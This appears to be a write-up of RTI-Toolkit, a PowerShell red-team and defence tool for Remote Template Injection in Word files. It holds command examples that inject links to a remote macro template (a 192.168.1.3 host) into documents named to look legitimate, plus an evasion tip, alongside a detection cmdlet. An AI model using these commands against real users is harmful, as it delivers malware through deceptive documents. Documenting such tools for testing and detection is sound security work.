RTI-Toolkit - PowerShell for RTI Attacks and Defense

RTI-Toolkit is an open-source PowerShell toolkit designed to facilitate Remote Template Injection (RTI) attacks and defenses.

It includes a PowerShell script, PS-Templator.ps1, which provides tools for both offensive and defensive cybersecurity operations. This guide explains the toolkit's features, usage, and examples.

Overview

Remote Template Injection (RTI) is a security vulnerability in Microsoft Office documents (e.g., Word) that exploits external template links embedded in DOCX files.

These documents store their content in XML format, which can be manipulated to include malicious links or resources. RTI attacks are often macro-based and can deceive users or exploit vulnerabilities.

The RTI-Toolkit helps security professionals implement and detect RTI vulnerabilities in Word documents.

Key Features

• Attacking Perspective:

• Inject remote template links into default Word templates or regular Word documents.

• Defensive Perspective:

• Identify remote template links in potentially malicious Word documents.

Supported File Types

The toolkit supports only DOCX files.

Version and License

• Current Version: 1.0.0

• License: MIT

Installation

To use the toolkit, load the PS-Templator.ps1 script as a PowerShell module:

Import-Module .\PS-Templator.ps1

Requirements

• Tested on Windows 10 with Office 2019 Professional Plus.

• No additional dependencies are required.

Cmdlets Overview

The toolkit includes three main cmdlets, each serving a specific purpose:

Cmdlet Usage and Examples

1. Invoke-Template

This cmdlet injects a malicious remote template link into a default Word template.

Example:

Invoke-Template -InputDoc Name.docx -Link "https://192.168.1.3:8080/Doc1.docm" -Output C:\Users\User\Desktop\LegitDocument.docx

Outcome:

• The original document is backed up.

• The malicious document is saved at the specified output path.

To debug, convert the malicious DOCX file to a ZIP archive and inspect /word/_rels/settings.xml.rels for the injected link.

2. Invoke-Regular

This cmdlet inserts a remote template link into a regular Word document without templates.

Example 1:

Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Nikos2.docx

Outcome:

• A backup of the original document is created.

• The malicious document is saved with the specified name.

Example 2 (OPSEC Enhancement):

Use the -TemplateName parameter to make the document appear more legitimate during analysis:

Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Legittemplate.dotx

To debug, inspect /docProps/app.xml for the fake template name after converting the DOCX file to a ZIP archive.

3. Invoke-Identify

This cmdlet identifies remote template links in Word documents, whether malicious or clean.

Example 1 (Malicious Document):

Invoke-Identify -InputDoc LegitDocument.docx -Output C:\Users\User\Desktop\output.txt

Outcome:
The output file contains details about any detected remote template links.

Example 2 (Non-Malicious Document):

Invoke-Identify -InputDoc Name.docx -Output C:\Users\User\Desktop\output2.txt

Outcome:
The output file confirms that no malicious links were found.

Acknowledgements

Special thanks to:

• @Papadope9 and Stavros Gkounis (a.k.a purpl3ph03n1x) for their assistance during beta testing.

• @S1ckB0y1337 for inspiring this tool during an iCAST Red Teaming Assessment.

Created with ❤️ by @nickvourd.

References

For further reading and related tools:

• ired.team

• attack.mitre.org

• GitHub repositories like remoteInjector by John Woodman and BadAssMacros by Inf0secRabbit

You can learn more and Download RTI-Toolkit in GitHub.

Upgrade Your Cybersecurity Skills EHA: Learn 150+ Practical Cyber Security Courses Online With Life Time Access - Enroll Her